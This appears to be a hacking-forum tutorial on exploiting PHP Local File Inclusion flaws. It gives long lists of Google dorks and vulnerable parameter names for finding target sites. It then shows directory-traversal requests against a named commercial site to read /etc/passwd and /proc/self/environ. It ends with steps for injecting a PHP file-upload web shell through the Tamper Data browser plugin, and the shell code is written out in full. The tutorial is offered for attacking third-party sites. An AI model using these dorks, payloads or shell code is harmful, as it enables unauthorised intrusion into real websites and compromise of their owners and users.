[Tut] Local File Inculusion / LFI (/proc/self/environ)

LFI (Local File Inclusion)

What is LFI or Local File Inclusion?
This Description from Wikipedia
is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
Example of Php Vulnerable script

<?php $file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}

So this script PHP could be injected like

http://example.com/index.php?file=contactus.php

OK Now i will show you POC exploited This vulnerablity The Way backdoored shell via Tamper data

1.First.you could search in google Vulnerable website.HEre Are The list of Dorks ive collected..

Dorks :

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=


LFI(Local File Inclusion)

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

2.OK after Get the Website,Check That Website
For example;

http://vanessasbodymall.com/index.php?page=products.php

Is that website could call /etc/passwd File ????
You could add an ../../ << To go to that Server Website Directory

http://vanessasbodymall.com/index.php?page=/etc/passwd

3.So if '/etc/passwd' could be Called So that Site Vulnerable With LFI.So How To plant WebShell/Backdoor? > You should check Wheather /proc/self/environ < Could be Called ,So The URI likes below

http://vanessasbodymall.com/index.php?page=../../../../../../../../proc/self/environ

4.Upload Sheel via tamper data
You Should download That firefox plugin..Here i Give U the link

https://addons.mozilla.org/en-us/firefox/downloads/file/79565/tamper_data-11.0.1-fx.xpi?src=addondetail&confirmed=1

Ok Next Step after installing the plugin

a.Restart Your browser Mozilla Firefox
b.Then Click "Tool" > "MenuBar" and klik "Tamper Data"
c.Click start tamper > lalu refresh page tersebut
d.So will be pop up > Click "Tamper"
e.Replace This Code or You could Replace anything php evil code

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

f.Yes Right..If You're Success plant That Php Script..This Script will be located at http://vanessasbodymall.com/Yourshellname.php

Search Terms :

• local file inclusion
• remote file inclusion
• local file inclusion tutorial
• local file inclusion vulnerability
• lfi local file inclusion
• local file inclusion exploit
• local file include
• web server vulnerability
• vulnerability php
• vulnerability of web server
• web server attacks

Read More